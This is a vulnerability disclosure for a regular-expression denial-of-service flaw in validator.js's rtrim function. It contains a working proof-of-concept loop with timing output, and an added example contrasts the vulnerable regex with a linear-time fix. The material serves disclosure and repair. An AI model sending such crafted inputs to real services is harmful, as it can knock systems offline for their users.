Headline
CVE-2021-3765: Inefficient Regular Expression Complexity in validator.js
validator.js is vulnerable to Inefficient Regular Expression Complexity
Description
I would like to report a Regular Expression Denial of Service (ReDoS) vulnerability in validator.
It allows an attacker to cause a denial of service when calling the function 'rtrim'.
The ReDoS vulnerability is mainly due to the regex /(\s)+$/g
and can be exploited with the following code.
Proof of Concept
// PoC.js
var validator = require("validator")
for(var i = 1; i <= 50000; i++) {
    var time = Date.now();
    // whitespace run that does not end the string: 'a', i*10000 spaces, 'a'
    var attack_str = 'a'+' '.repeat(i*10000)+"a";
    validator.rtrim(attack_str);
    var time_cost = Date.now() - time;
    console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}
The Output
"attack_str.length: 10002: 326 ms"
"attack_str.length: 20002: 1105 ms"
"attack_str.length: 30002: 2489 ms"
"attack_str.length: 40002: 4462 ms"
"attack_str.length: 50002: 6967 ms"
"attack_str.length: 60002: 10265 ms"
Reference
I have opened an issue before, but it is still not safe after the fix.
For a repair, you can refer to the rtrim function in the trim package.
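As an added example (not code from validator.js or from the trim package), the regex the report names sits beside a loop-based rtrim that inspects each character at most once, with a small timing harness over the PoC's input shape; the function names and the 20000-space default are assumptions of this example.

```javascript
// Added example, not validator.js's or the trim package's code.
// rtrimRegex reproduces the pattern the report names; rtrimLinear is a
// loop-based replacement that touches each character at most once.

// Vulnerable shape: a capturing group under "+" anchored to "$". On
// 'a' + N spaces + 'a' the engine retries the group from every space and
// then fails at the final 'a', which is quadratic in N.
function rtrimRegex(str) {
  return str.replace(/(\s)+$/g, '');
}

// Hardened: walk back from the end while the character is whitespace,
// then slice. No backtracking, so cost is linear in the input length.
function rtrimLinear(str) {
  let end = str.length;
  while (end > 0 && /\s/.test(str.charAt(end - 1))) {
    end -= 1;
  }
  return str.slice(0, end);
}

// Constructed input with the PoC's shape: whitespace that never ends the string.
function attackString(spaces) {
  return 'a' + ' '.repeat(spaces) + 'a';
}

// Wall-clock cost of one call, in milliseconds.
function timeMs(fn, input) {
  const start = Date.now();
  fn(input);
  return Date.now() - start;
}

// Checks both functions agree on ordinary inputs, then times each on the
// attack shape. Returns the two timings so callers can compare them.
function demo(spaces = 20000) {
  const samples = ['abc  \t\n', '  abc  ', '', '   ', 'a b\u00a0', attackString(5)];
  for (const s of samples) {
    if (rtrimRegex(s) !== rtrimLinear(s)) {
      throw new Error('mismatch on ' + JSON.stringify(s));
    }
  }
  const input = attackString(spaces);
  return { regexMs: timeMs(rtrimRegex, input), linearMs: timeMs(rtrimLinear, input) };
}
```

demo().regexMs grows steeply as the space count rises, matching the report's output table, while demo().linearMs stays flat.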
Occurrences